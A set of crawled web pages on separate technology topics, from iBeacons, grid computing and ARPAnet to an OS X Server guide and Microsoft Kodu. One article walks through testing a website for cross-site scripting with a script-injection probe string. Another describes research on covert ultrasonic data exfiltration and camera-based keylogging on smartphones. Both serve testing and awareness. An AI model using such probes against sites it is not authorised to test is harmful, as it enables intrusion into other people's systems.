As your school is preparing for the 2015-2016 school year, empower your IT staff by leveraging iBeacons. Allow your students to feel more ownership of their devices by providing the content when they need it and in a way they prefer to consume it. The Apple platforms provide such a rich learning environment and the Casper Suite with iBeacons pave the way to a more simple, successful rollout. | <urn:uuid:29b05f62-7637-432a-9d1b-515e09807dbe> | CC-MAIN-2017-04 | https://www.jamf.com/blog/the-benefits-of-ibeacons-for-education/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283475.86/warc/CC-MAIN-20170116095123-00453-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.952141 | 971 | 3.09375 | 3 |
IBM and other vendors and research organizations are working on a system that will make computing more efficient and more accessible for users.
LAS VEGAS -- IBM Corp. and other vendors and research organizations are working on a system that will make computing more efficient and more accessible for users.
The concept, known as grid computing, is hardly new. It’s better known as distributed computing and has been around in one form or another for decades. But if the work that IBM and its allies are doing comes to fruition, it could dramatically reduce the complexity of network computing, said Irving Wladawsky-Berger, vice president of technology and strategy in IBM’s server group, in his keynote address at the NetWorld+Interop show here Wednesday.
Grid computing involves linking numerous remote machines together and harnessing their individual processing power and storage capabilities for the good of the whole. Several small, special-purpose grids are already in use, including one used by a group of physicists to share research data and ideas.
"If something is too complex for high-energy physicists and requires them to invent a grid, it says something about the state of IT today," Wladawsky-Berger said.
He added that the productivity gains and efficiencies promised by the advent of the Internet have yet to be realized, but could materialize quickly if and when grid computing becomes widespread.
"We fell in love with the technology and we saw over the next few years it really turned into this tremendous hype," he said. "The real productivity happens when you start integrating all the processes and start to have end-to-end automation."
The efforts of grid computing’s proponents have already produced a plan called the Open Grid Services Architecture, which Wladawsky-Berger says will be the key to grid computing gaining widespread acceptance in the enterprise world. The architecture utilizes open standards and protocols such as SOAP, XML and WSDL and ultimately will enable participants to build a network capable of self-management.
Such a system would be able to automatically route traffic around bottlenecks or machines that have crashed, detect and counter malicious attacks and perform other tasks that today require human intervention.
"Where were going over time is to make it as easy as possible for businesses to decide how to deploy services," Wladawsky-Berger said. | <urn:uuid:b4039b52-11b4-4d3f-9eaf-1c4a0ff87953> | CC-MAIN-2017-04 | http://www.eweek.com/c/a/Cloud-Computing/IBM-Backs-Renewed-Grid-Efforts | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279379.41/warc/CC-MAIN-20170116095119-00271-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.961737 | 476 | 2.59375 | 3 |
Long before the internet, there was a simplier time when the typical mode of communication was a telephone. These early communication devices were based on the idea of circuit switching, where a dedicated circuit is tied up for the duration of the call and communication is only possible with the single party on the other end of the circuit. In the 1970's a major shift occurred, this shift was the move from circuit switching to a newer packet switching methods. With packet switching, a system could use one communication link to communicate with more than one machine by disassembling data into datagraphs, then gather these as packets. Not only could the link be shared (much as a single post box can be used to post letters to different destinations), but each packet could be routed independently of other packets. This was a revolutionary advancement and lead directly to a US military project called ARPAnet.
ARPAnet which stands for Advanced Research Projects Agency Network and is widely considered the first packet switching network and a direct predessor to today's Internet and what I consider the first compute cloud.
What's interesting about ARPAnet and today's move toward cloud computing is that they both shared similar ideals and goals.
- Both are designed to work unambiguously with a broad range of computer architectures
- Both are designed were to designed to be multi-tenant
- Both are designed to be global and distributed across geographically disperse environments.
- Both are application agnostic, meaning they could support a wide variety of applications from voice to data.
- Both are designed withstand losses of large portions of the underlying networks. ARPANET was designed to survive network losses, but the main reason was actually that the switching nodes and network links were not highly reliable, similar today internet;
I'll keep you posted as continue to write my cloud computing guide. If you're interested in contributing, please get in touch.
* 1 Abbate, Inventing the Internet, pp. 8
* 2 Norberg, O'Neill, Transforming Computer Technology, pp. 166
* 3 Hafner, Where Wizards Stay Up Late, pp. 69, 77
* 4 A History of the ARPANET, Chapter III, pg.132, Section 2.3.4
A few people have pointed out that ARPAnet wasn't global. I'll look into it. | <urn:uuid:b852f1c1-3882-49ab-b7cf-91743f244d06> | CC-MAIN-2017-04 | http://www.elasticvapor.com/2008/09/arpanet-first-globla-compute-cloud.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281659.81/warc/CC-MAIN-20170116095121-00389-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.964054 | 482 | 3.53125 | 4 |
Today's K-12 schools are challenged with enhancing student and staff development. Common core standards are driving school districts to invest in new technologies to bring mobile learning, online content and professional digital development to the classroom. Having a strong network infrastructure to successfully support these initiatives is essential. And ensuring it functions in a secure manner is critical.
Digital learning can open up a world of possibilities. From tablets and smartphones to interactive learning tools, it’s all transforming the teacher-student model into a new learning environment where everyone’s engaged and excited to learn.
So, how do you get started? Our solutions experts will work with your school district and IT group to build end-to-end solutions.
We design, deliver and support educational solutions through our:
In today's world, technology is an essential tool. It offers teachers new ways to enrich their students' learning experiences. It offers students the ability to connect to learning opportunities anywhere, anytime.
Technology empowers teachers like never before to support their personal mission of providing the best possible education to their students.US Secretary of Education Arne Duncan
K-12 Key Objectives
Given the challenges schools face to provide a higher level of learning, implementing the right mix of technologies that foster growth is required. We work closely with school administrators and IT planners to achieve technology driven strategies to improve student achievement and establish universal access to high performance tools in the support of quality instruction by:
Keeping school employees connected - administrators, security, teachers and custodians are on the move. We can give these users the tools they need to stay connected.
Improving the readiness and service levels of existing wireless infrastructures by increasing broadband capacity capacity to keep up with the increasing amount of tablet and iPad usage.
"One-to-one computing" to provide an environment where classrooms are equipped with a dedicated wireless Access Point.
Deploying a Mobile Device Management program which monitors, manages and supports mobile devices and enables students to reach only authorized Internet sites.
Compliance with FCC regulations, including the Children's Internet Protection Act (CIPA). This protects student access when they take a tablet or iPad off of school property, which includes a security offering supplying filters and firewalls necessary to maintain CIPA compliance.
Integrating the use of technology tools and digital content to engage students in daily instruction by introducing mobile life size video conferencing and interactive white boards to promote distant learning and access to worldwide resources.
Ensuring that staff is capable of effectively using technology tools and digital content by providing guidance and training. | <urn:uuid:00f08c73-a32b-45da-addb-898bb3f79189> | CC-MAIN-2017-04 | http://www.carouselindustries.com/industry-solutions/towns-and-schools/k-12-educational-solutions/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280266.9/warc/CC-MAIN-20170116095120-00023-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.921299 | 522 | 2.8125 | 3 |
Testing for Cross Site Scripting VulnerabilityBy Regina Kwon | Posted 2002-11-01 Email Print
Will your Web site pass our security tests?
Cross-site scripting (also known as XSS or CSS) occurs when a Web application gathers malicious data from a user. The data is usually gathered in the form of a hyperlink that contains malicious content within it. Dynamic pages that are vulnerable to this hack include search results, error messages and Web-form results pages that echo data entered by the user.
After collecting data from a user, a Web application may create an output page for the user--such a page may contain the malicious data that was originally sent to it, but in such a way as to appear to be valid content from the Web site.
An attacker who uses cross-site scripting successfully might compromise confidential information, manipulate or steal cookies, create requests that can be mistaken for those of a valid user or execute malicious code on the end user's computer.
You'll specifically want to find an interactive page that accepts the data you input and displays it back to you on a results page. Search functions and registration or login pages are likely spots to check.
Once you have located a search engine or login form, type the word test into the search field or login name.
Press the Enter or Return key. This will send your request to the Web server.
Note whether the results repeat the text that you entered, as in the following examples:
- "Your search for 'test' did not find any items"
- "Your search for 'test' returned the following results"
- "User 'test' is not valid"
- "Invalid login 'test'"
If the word test appears in the result page, then your site offers an entryway for cross-site scripting.
To test for cross-site scripting, input the string <script>alert('hello')</script> into a submission field, in much the same way you entered test in Step 3. Press the Enter or Return key to send your request to the Web server.
If the server responds with a popup box that displays the word "hello," then the Web site is vulnerable to cross-site scripting.
Sometimes a popup window may not launch even though the site is vulnerable. You may have to search the HTML source of the page. Go to View | Source in Microsoft Internet Explorer or View | Page Source in Netscape. In the document that opens, search for the phrase
and click the Find Next button. If the text is found, then the Web server is vulnerable to cross-site scripting.
Read about ways to defend your site in SPI Dynamics' Cross-Site Scripting white paper. | <urn:uuid:28b99af2-d0e2-4b09-8fe1-950be060b34b> | CC-MAIN-2017-04 | http://www.baselinemag.com/c/a/Projects-Security/Testing-for-Web-Site-Vulnerabilities/2 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280888.62/warc/CC-MAIN-20170116095120-00261-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.858615 | 554 | 3.46875 | 3 |
FROM THE WEB OF DOCUMENTS TO THE WEB OF DATA
In 1989, while a fellow at CERN, the European Particle Physics Laboratory in Geneva, Switzerland, Tim Berners-Lee invented the World Wide Web. Today he is 3Com Founders Professor of Engineering at the Massachusetts Institute of Technology (MIT), where he serves as director of the World Wide Web Consortium (W3C), an international standards body dedicated to leading the Web to its full potential. Sir Tim is the author of Weaving the Web. Jason Rubin spoke with him at his office in Cambridge, Massachusetts.
Twenty years on, the World Wide Web has proven itself both ubiquitous and indispensible. Did you anticipate it would reach this status, and in this time frame?
Tim Berners-Lee: I think while it’s very tempting for us to look at the Web and say, “Well, here it is, and this is what it is,” it has, of course, been constantly growing and changing—and it will continue to do so. So to think of this as a static “This is how the Web is” sort of thing is, I think, unwise. In fact, it’s changed in the last few years faster than it changed before, and it’s crazy for us to imagine this acceleration will suddenly stop. So yes, the 20-year point goes by in a flash, but we should realize that, and we are constantly changing it, and it’s very important that we do so.
I believe that 20 years from now, people will look back at where we are today as being a time when the Web of documents was fairly well established, such that if someone wanted to find a document, there’s a pretty good chance it could be found on the Web. The Web of data, though, which we call the Semantic Web, would be seen as just starting to take off. We have the standards but still just a small community of true believers who recognize the value of putting data on the Web for people to share and mash up and use at will. And there are other aspects of the online world that are still fairly “pre-Web.” Social networking sites, for example, are still siloed; you can’t share your information from one site with a contact on another site. Hopefully, in a few years’ time, we’ll see that quite large category of social information truly Web-ized, rather than being held in individual lockdown applications.
You mentioned a “small community” of people who see the value of the Semantic Web. Is that a repeat occurrence of the struggle 20 years ago to get people to understand the scope and potential impact of the World Wide Web?
It’s remarkably similar. It’s very funny. You’d think that once people had seen the effect of Web-izing documents to produce the World Wide Web, doing likewise with their data would seem the next logical step. But for one thing, the Web was a paradigm shift. A paradigm shift is when you don’t have in your vocabulary the concepts and the ideas with which to understand the new world. Today, the idea that a web link could connect to a document that originates anywhere on the planet is completely second nature, but back then it took a very strong imagination for somebody to understand it.
Now, with data, almost all the data you come across is locked in a database. The idea that you could access and combine data anywhere in the world and immediately make it part of your spreadsheet is another paradigm shift. It’s difficult to get people to buy into it. But in the same way as before, those who do get it become tremendously fired up. Once somebody has realized what it would be like to have linked data across the world, then they become very enthusiastic, and so we now have this corps of people in many countries all working together to make it happen.
Do you see the Semantic Web as enabling greater collaboration between and among parties, as opposed to the point-to-point or point-to-many communication that seems more prevalent in the current Web?
The original web browser was a browser editor and it was supposed to be a collaborative tool, but it only ran on the NeXT workstation on which it was developed. However, the idea that the Web should be a collaborative place has always been a very important goal for me. I think harnessing the creative energy of people is really important. When you get people who are trying to solve big problems like cure AIDS, fight cancer, and understand Alzheimer’s disease, there are a huge number of people involved, all of them with half-formed ideas in their minds. How do we get them communicating so that the half of an idea in one person’s head will connect with half of an idea in somebody else’s head, and they’ll come up with the solution?
That’s been a goal for the Web of documents, and it’s certainly a goal for the Web of data, where different pieces of data can be used for all kinds of different things. For example, a genomist may suspect that a particular protein is connected to a certain syndrome in a cell line, search for and find data relating to each area, and then suddenly put together the different strains of data and discover something new. And this is something he can do with the owners of the respective pieces of data, who might never have found each other or known that their data was connected. So the Web of data will absolutely lead to greater collaboration.
Is your vision of the Semantic Web one in which data is freely available, or are there access rights attached to it?
A lot of information is already public, so one of the simple things to do in building the new Web of data is to start with that information. And recently, I’ve been working with both the U.K. government and the U.S. government in trying not only to get more information on the Web, but also to make it linked data. But it’s also very important that systems are aware of the social aspects of data. And it’s not just access control, because an authorized user can still use the right data for the wrong purpose. So we need to focus on what are the purposes for accessing different kinds of data, and for that we’ve been looking at accountable systems.
Accountable systems are aware of the appropriate use of data, and they allow you to make sure that certain kinds of information that you are comfortable sharing with people in a social context, for example, are not able to be accessed and considered by people looking to hire you. For example, I have a GPS trail that I took on vacation. Certainly, I want to give it to my friends and my family, but I don’t necessarily wish to license people I don’t know who are curious about me and my work and let them see where I’ve been. Companies may want to do the same thing. They might say, “We’re going to give you access to certain product information because you’re part of our supply chain and you can use it to fine-tune your manufacturing schedule to meet our demand. However, we do not license you to use it to give to our competition to modify their pricing.”
You need to be able to ask the system to show you just the data that you can use for a given task, because how you wish to use it will be the difference in whether you can use it. So we need systems for recording what the appropriate use of data is, and we need systems for helping people use data in an appropriate way so they can meet an ethical standard.
Ultimately, what is one of the most significant things the Semantic Web will enable?
One thing I think we’ll be able to do is to write intelligent programs that run across the Web of data looking for patterns when something went wrong—like when a company failed, or when a product turned out to be dangerous, or when an ecological catastrophe happened. We can then identify patterns in a broad range of data types that resulted in something serious happening, and that will allow us to identify when these patterns recur, and we’ll be better able to prepare for or prevent the situation.
I think when we have a lot of data available on the Web about the world, including social data, ecological data, meteorological data, and financial data, we’ll be able to make much better models. It’s been quite evident over the last year, for example, that we have a really bad grasp of the financial system. Part of the reason for that might be that we have insufficient data from which to draw conclusions, or that the experts are too selective in which data they use. The more data we have, the more accurate our models will be.
After 20 years, what about the Web—either its current or future capabilities—excites you the most?
One of the things that gets me the most excited are the mash-ups, where there’s one market of people providing data and there’s a second layer of people mashing up the data, picking from a rich variety of data sources to create a useful new application or service. A classic example of a mash-up is when I find a seminar I want to go to, and the web page has information about the sponsor, the presenter, the topic, and the logistics. I have to write all that down on the back of an envelope and then go and put it in my address book; I have to put it in my calendar; I have to enter the address in my GPS—basically, I have to copy this information into every device I use to manage my life, which is inefficient and time-consuming. This is because there is no common format for this data to become integrated into my devices.
Now, the vision of Semantic Web is that the seminar’s web page has information pointed at data about the event. So I just tell my computer I’m going to be attending that seminar and then, automatically, there is a calendar that shows things that I’m attending. And automatically, an address book I define as having in it the people who have given seminars that I’ve attended within the last six months appears, with a link to the presenter’s public profile. And automatically, my PDA starts pointing towards somewhere I need to be at an appropriate time to get me there. All I need to do is say, “I’m going to that seminar,” and then the rest should follow.
The Web is such a mélange of useful, noble content and stuff that runs the gamut from the mundane to the grotesque. Do you think humanity is using this incredible invention of yours appropriately?
Yes. The Web, after all, is just a tool. It’s a powerful one, and it reconfigures what we can do, but it’s just a tool, a piece of white paper, if you will. So what you see on it reflects humanity—or at least the 20 percent of humanity that currently has access to the Web.
As a standards body, the W3C is not interested in policing the Web or in censoring content, nor should we be. No one owns the World Wide Web, no one has a copyright for it, and no one collects royalties from it. It belongs to humanity, and when it comes to humanity, I’m tremendously optimistic. After 20 years, I’m still very excited and extremely hopeful. | <urn:uuid:45826925-d61f-4cfc-b823-92ec4b8fc70d> | CC-MAIN-2017-04 | https://www.emc.com/leadership/articles/berners-lee.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282631.80/warc/CC-MAIN-20170116095122-00499-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.960516 | 2,426 | 2.546875 | 3 |
Nov/Dec 2016 Digital Edition
Oct 2016 Digital Edition
Sept 2016 Digital Edition
Aug 2016 Digital Edition
July 2016 Digital Edition
June 2016 Digital Edition
May 2016 Digital Edition
DARPA looks to nanotechnology to target illnesses
The Defense Advanced Research Projects Agency hopes to develop intracellular platforms to fight diseases in warfighters.
The research agency issued a solicitation on June 8 for help developing In Vivo Nanosensors for Therapeutics (IVN:Tx) that would fight diseases on a cellular level rather than relying on disease-specific medicines that require expensive and expansive storage and shipment. It said the new platform is needed because research like that done by the Military Infectious Disease Research Program has shown more warfighters are hospitalized each year for infectious diseases than are wounded in combat.
The negative effects of warfighter illness and downtime multiply when extended across the military, it said. Numerous medicines have to be transported to military treatment facilities around the world, soldiers must be trained to fill new roles, and in some cases operational plans must be modified or even postponed, it said.
The rapidly deployed and adaptable IVN:Tx platform to treat military-relevant disease may reduce logistical burdens and increase operational readiness , it said. The platform looks to revolutionary treatment methods to get sick warfighters back on their feet, fast. The agency’s solicitation calls for development of nanoplatforms that treat a variety of diseases, including nanoparticle therapeutic platforms that could be rapidly modified to treat a broad range of diseases, but based on safe and effective technologies.
The civilian medical community has been using small-molecule therapeutics to treat diseases for years, it said, because traditional drugs are often effective against only one disease, can have significant side effects and are very expensive to develop. “Doctors have been waiting for a flexible platform that could help them treat a variety of problematic diseases,” said Timothy Broderick, physician and DARPA program manager. “DARPA seeks to do just that by advancing revolutionary technologies such as nanoparticles coated with small interfering RNA (siRNA). RNA plays an active role in all biological processes, and by targeting RNA in specific cells, we may be able to stop the processes that cause diseases of all types—from contagious, difficult-to-treat bacteria such as MRSA to traumatic brain injury.”
The agency said safety is a key factor to the many potential technical approaches for IVN:Tx. Nanoplatforms, it said, must be biocompatible, nontoxic and designed with eventual regulatory approval in mind.
The IVN:Tx approach of treating illness inside specific cells may also minimize dosing required for clinical efficacy, limit side effects and adverse immune system response, it said. Similar to today’s medicines, the therapeutic nanoparticles will move throughout the body in a natural, passive manner, it added.
The agency noted that IVN is a technology demonstration and human trials wouldn’t be funded. However, it encouraged proposers to submit plans for testing that would result in a clinical protocol prepared for approval from the Food and Drug Administration (FDA). The FDA will be engaged with the IVN:Tx team throughout the program lifecycle by reviewing proposals, participating in Proposers’ Day meetings and participating in government review boards, it said. | <urn:uuid:4b8bfd2f-7398-4cfb-8e79-e48c464cd983> | CC-MAIN-2017-04 | http://gsnmagazine.com/node/26515?c=military_force_protection | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285244.23/warc/CC-MAIN-20170116095125-00251-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.943837 | 681 | 2.703125 | 3 |
You've certainly heard the word "server." It's a type of computer that generally provides or manages services. For example, this website is hosted on a web server, a computer running specific software that can respond to browser requests and send web pages to users anywhere on the internet. You send email through a mail server, a computer with software that routes email to and from your account. And a file server is a computer set up as a receptacle for files, so other users can connect to it and copy files to and from it.
A server is nothing more than a standard computer; what differentiates it from a "client" computer—such as the one you're working on—is its software and its ability to receive and process connections and requests.
You may not realize it, but your Mac is a server too. It contains all the software you need to host websites, manage email, serve files, and much more. All you need to do is turn on these "services." Apple makes this really easy; you can buy the OS X Server app (for $20) from the Mac App Store, and tweak a few settings, and then turn your Mac into a server in minutes.
OS X Server runs on any Mac that runs El Capitan, even an old Mac. Most users don't need a server, but I'm going to explain a few reasons why you might want to bring an old Mac to life with OS X Server. You don't need a fast Mac for these tasks; I use a five-year old Mac mini as my server (the only requirement is that it be able to run El Capitan and have at least 2 GB RAM). It's inexpensive, easy to set up, and offers a lot of advantages.
Download and Install OS X Server
Start by purchasing the OS X Server app from the Mac App Store. When you've downloaded it to your old Mac, launch the app and follow its instructions. You'll need to choose a name for the server, and you'll be asked to enter your Apple ID and password to use certain services. Server will take a couple of minutes to do its duties, then it'll be ready.
You'll notice that Server is an app. You use this app to configure, manage, and control services. You'll want to install it on your server to manage that computer, but you may also want to install it on another Mac, the one you use everyday. You can run your OS X server "headless," without a monitor, keyboard, or mouse, and control it, using the Server app, from another Mac.
If you want to work with a headless server, try now, from your other Mac, to connect to your server. Open the Server app, and see if your server is listed. If not, try clicking "Other Mac" and entering its host name, in the form name.local. So if you named your server MyServer, you would enter MyServer.local. You'll use the same user name and password that was already set up on that Mac to authenticate.
When the Server app opens, you'll see an Overview screen, along with a lot of options in the sidebar.
I won't look at all of them; you can find out more about the available services on Apple's OS X Server Tutorials page. I'm going to look at three services in this article:
- File Sharing
- Time Machine
This service lets your server keep copies of updates and apps you download to your Macs and iOS devices. These devices don't need to be configured; they automatically discover the server, and downloads go through the server, are stored there, then get passed on to the devices.
If you have more than one Mac or iOS device, any apps or updates you download will be cached, or stored on the server, so the other devices don't need to download them. This saves you time and bandwidth. However, for iOS devices, this only works with updates for the exact same model of a device; a cached update to iOS for your iPad won't work on your iPhone, and an iPhone 6s update won't work on an iPhone SE.
All you need to do to turn this on is click "Caching" in the sidebar, and toggle the switch to On. You can also choose to cache iCloud Data, if you wish. At the bottom of the Caching pane, you choose how much space you want the cache to use. As you can see in the below image, my server is currently using 32.9 GB, and that's for two Macs and several iOS devices; the server has been running since El Capitan was released last fall. So you could set, say, 50 GB for caching, and be more than comfortable.
You may not need to use the File Sharing service, but if you want a centralized storage location for files on your network, you can activate this service. Click "File Sharing" in the sidebar, toggle the switch to On, and then add folders in the Shared Folders section.
You can connect one or more external drives to your server, so you can have virtually unlimited storage for your files. I use it, among other things, for my video collection, using Plex. This software runs on my server, and allows me to view videos on my Apple TV, my Macs, my iOS devices, and even remotely.
Just remember, any files that you store on the server need to be backed up.
One backup with Intego Personal Backup is good; a second backup with Time Machine is even better. OS X Server lets you back up your Macs over your network to the server. So if you have one or more laptops in your household, you can set them to back up automatically to Time Machine on the server, rather than worrying about connecting external hard drives to them for backups.
Click "Time Machine" in the sidebar, toggle the switch to On, and then choose a destination. If you can, devote an entire external hard drive to Time Machine; the more space you provide to Time Machine, the more backups it will be able to store.
On each of the Macs you want to back up, open the Time Machine pane of System Preferences, click Select Disk, and you'll see that the Mac automatically shows you the Time Machine disk on the server. Select it, and your backups will go to the server.
Managing the Server
You can manage the server's specific services using the Server app, but there are other management tasks you may need to perform, such as installing software updates or managing files. You can do this remotely using OS X's Screen Sharing.
To do this, from another Mac, choose Go > Network in the Finder (or you can press and hold, Up—Command—K). Double-click the server, and then click "Share Screen." Enter the user name and password for the server, and you'll be able to see your server's screen as if you were in front of it.
One thing I find useful is to use a display emulator on my server; it's a tiny dongle that I plug into the HDMI port, which changes the resolution so it's easier to see. If you don't use this, you can only view the server in one resolution in screen sharing.
Once you've connected with Screen Sharing, you can manage such things as updates (through the Mac App Store app, if you haven't turned on automatic updates), and you can move files around, if you have more than one disk connected to the server.
The idea of setting up a server may seem complicated, but with OS X it's quite simple. As you've seen above, there are some nifty ways you can use OS X Server, even taking advantage of an old Mac that's just gathering dust.
Try it out! You may find that it makes your computing life a bit easier.
Have something to say about this story? Share your comments below! | <urn:uuid:a64430bb-fefd-4007-a462-5168c57637b9> | CC-MAIN-2017-04 | https://www.intego.com/mac-security-blog/bring-an-old-mac-to-life-with-os-x-server/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279176.20/warc/CC-MAIN-20170116095119-00162-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.943808 | 1,635 | 2.671875 | 3 |
Do you regard your smartphone's speakers and microphone as a security threat? You might after checking out presentations from the 8th USENIX Workshop on Offensive Technologies (WOOT). If you were a target, you would neither see nor hear these stealthy smartphone hacks happening.
Covert sound-based attacks using smartphone speakers and microphone
Our ears don’t hear ultrasonic sound, but speakers on our phones can produce those inaudible frequencies that can be exploited to exfiltrate data. A mobile device would first have to be infected with a Trojan, like from a tainted app, but even if the device is locked down so that data can’t be stolen over the network, covert sound-based attacks could still steal the data.
Luke Deshotels, from North Carolina State University, presented “Inaudible Sound as a Covert Channel in Mobile Devices” (pdf). It focuses on two proof-of-concept sound-based attacks that bypass Android security mechanisms; one using isolated sound and another using ultrasonic sound.
Unlike Bluetooth access, which is “listed as a dangerous permission on Android that users must explicitly allow,” ultrasonic sound “does not require permission and can emit sounds to anything that can hear them regardless of a pairing process.” The “ultrasonic sound can be received by a microphone on the same device or on another device.” The researchers “implemented an ultrasonic modem for Android and found that it could send signals up to 100 feet away.” If you think you might notice due to battery drain, the researchers noted that the transmission of the ultrasonic signal didn’t seem to use much power.
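To make the covert channel concrete, here is a minimal sketch of the idea, not taken from the paper: the carrier frequencies, symbol length, and modem design below are illustrative assumptions. It encodes bits as short near-ultrasonic tones (binary FSK) and recovers them with a Goertzel filter, using only the Python standard library:

```python
import math

SAMPLE_RATE = 44100                      # typical phone audio rate
FREQ_0, FREQ_1 = 18_000, 19_000          # assumed near-ultrasonic carriers
SYMBOL_LEN = 2048                        # samples per transmitted bit

def tone(freq, n=SYMBOL_LEN):
    """Synthesize one symbol as a pure sine tone."""
    return [math.sin(2 * math.pi * freq * i / SAMPLE_RATE) for i in range(n)]

def encode(bits):
    """Map each bit to its carrier tone (binary frequency-shift keying)."""
    samples = []
    for b in bits:
        samples.extend(tone(FREQ_1 if b else FREQ_0))
    return samples

def goertzel_power(samples, freq):
    """Signal power at a single frequency (Goertzel algorithm)."""
    k = 2 * math.cos(2 * math.pi * freq / SAMPLE_RATE)
    s_prev = s_prev2 = 0.0
    for x in samples:
        s = x + k * s_prev - s_prev2
        s_prev2, s_prev = s_prev, s
    return s_prev2 ** 2 + s_prev ** 2 - k * s_prev * s_prev2

def decode(samples):
    """Recover bits by comparing power at the two carrier frequencies."""
    bits = []
    for i in range(0, len(samples), SYMBOL_LEN):
        chunk = samples[i:i + SYMBOL_LEN]
        bits.append(1 if goertzel_power(chunk, FREQ_1) > goertzel_power(chunk, FREQ_0) else 0)
    return bits

message = [1, 0, 1, 1, 0, 0, 1, 0]
assert decode(encode(message)) == message
```

In the attack described above, an infected transmitter would play such samples through the speaker while a receiver samples a microphone; a real implementation would also have to handle noise, synchronization, and the speaker's frequency response.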
Short vibrations that can be felt but not heard were an example of isolated sound from Android devices. “These vibrations can be detected by the accelerometer, but they are not loud enough for humans to hear. If performed while the user is not holding the device, the vibrations will not be noticed.” Yet those short vibrations “can be detected by the accelerometer or microphone of the same device.” During an experiment to test isolated sound, the researchers used a Samsung Galaxy S4 as a transmitter running a vibration loop and a Google Nexus 7 as a receiver running an accelerometer monitor.
Using these sound-based attacks, the bit rate the researchers chose for distance experiments was “fairly low, but it is still sufficient for leaking sensitive data;” in fact, "IDs, social security numbers, credit card numbers, coordinates of locations visited, passwords, and more could be leaked in less than one minute."
They warned, “Data exfiltration via sound on mobile devices is a practical attack. The ranges supported by our implementation are more than sufficient for an attacker to stealthily record from an infected device. The maximum bitrates we recorded are also sufficient for sharing images and documents in intra-device attacks.”
The sound-based attacks could also be utilized by sensory malware that abuses the sensors of the infected device. Examples of such malware include PlaceRaider, which remotely exploits the Android camera and secretly snaps a picture every two seconds; Soundcomber, an Android app that listens in on calls and steals credit card data; and TapPrints (pdf), which was 80 to 90% accurate at determining what was being typed on a smartphone or tablet.
“Many of the sensors and actuators on mobile devices are grossly underestimated in terms of their impact on security,” the research paper states. “No explicit permission is required to access the accelerometer despite the many potential ways to abuse it. The same can be said for the speakers and vibrator.”
As network security increases, and network connections are more closely monitored, the researchers said attackers will start using unconventional methods to steal data.
Covert attacks using smartphone cameras
Many places of employment deal with military contracts and a high level of secrecy, so employees are not allowed to have a camera in their phones; it must be removed by a technician and certified before the smartphone is allowed in the building. While that policy is mostly aimed at preventing photography, researchers demonstrated further threats: both front-facing and rear-facing smartphone cameras can be used to steal keystrokes and fingerprints.
Tobias Fiebig, Jan Krissler, and Ronny Hänsch from the Berlin University of Technology presented “Security Impact of High Resolution Smartphone Cameras” (pdf) at WOOT. Their attacks would get around any anti-malware and keylogging mechanisms such as a separate OS compartment on high-security smartphones.
Have you ever stopped to think of the front-facing camera on your phone as a keylogger? How far away do you hold your smartphone from your face? The researchers demonstrated how an "attacker can use reflections in the user's face to perform keylogging with a smartphone's front camera." The attack works even on phones with low-resolution cameras: phone "cameras with only 2MP are already sufficient for corneal keylogging if the phone is held in not more than 30 centimeters (11.8 inches) distance. Cameras of 32MP even allow for keylogging operations if the phone is held at 60 cm (23.6 inches) distance."
Let’s say your phone is facing down on your desk and you reach to pick it up. In the instant your finger touches the rear-facing camera, an attacker could nab your fingerprint. After that photo of your fingerprint has been extracted, it can then be used to create forgeries.
The researchers gave an attack scenario on a high profile target such as the secretary of defense who would have an encrypted phone and two different OS compartments, one for work, one for personal use. An attacker could use the front-facing camera as a “facial reflection-based keylogger to extract the pin-code.” The rear-facing camera could grab the fingerprint needed for the secretary of defense’s biometric security code.
Even if the target notices the theft within 15 minutes and issues a remote wipe, it’s too late. The researchers suggested, “To hide their actions behind confusion, the attackers then use the forged fingerprints on a knife that is used in a murder. With the secretary of defense implicated in a crime, the whole incident goes unnoticed within the ensuing scandal.” While that might sound far-fetched, or like a plot from a movie, the attacks were not theory but actually tested by the researchers…just not on the secretary of defense.
They suggested capping the cameras with hardware lids to prevent attackers from stealing sensitive info and penetrating high-security environments.
Microsoft ships its Kodu Game Lab, which helps kids learn to program in a video game setting. The company also launched the Kodu Cup competition.
Microsoft has announced the availability of the first full non-beta version of its game-development tool, Microsoft Kodu Game Lab for the PC, which is available as a free download at http://fuse.microsoft.com/kodu. Kodu, which first debuted in 2009 when the beta was shown at the Consumer Electronics Show (CES), is Microsoft's game-development tool for children to create and play their own games on the PC and Xbox.
Although it is a programming language, Kodu resembles a video game interface with which children can drag and drop icons to create their own unique games, worlds, and landscapes, as well as their own rules and scenarios. Kids as young as five years old have used it, though the game is actually aimed at children aged nine and up. The concept of Kodu came from a dad, Matt Maclaurin, who was looking for a way to help his own daughter learn the basics of programming.
Microsoft Research developed it specifically as an educational tool to help develop children's creativity and logic skills while furthering their interest in programming and possibly future careers in science, technology, engineering and math (STEM). As stated in President Obama's State of the Union address in late January 2011, STEM skills are increasingly critical to remaining competitive in the work force.
In a March 16 blog post, Lili Cheng, general manager of the Future Social Experiences (FUSE) Labs at Microsoft, which sponsors Kodu, said: "According to the U.S. Department of Labor, the U.S. will have more than 2 million job openings in STEM-related fields by 2014, yet fewer than 15 percent of U.S. college undergraduates now pursue degrees in science or engineering. Of course, it's not just about jobs. We need more STEM graduates to create the next innovations so important to the U.S.' future."
Kodu features include:
- A visual user menu that requires no experience to create 2-D or full 3-D interactive video games.
- An interactive system that guides users through each step of making a game: creating terrain, adding characters and programming them.
- A community feature that enables sharing games with other PC-based Kodu Game Lab users.
- A visual language that eliminates syntax errors, with no cryptic error messages.
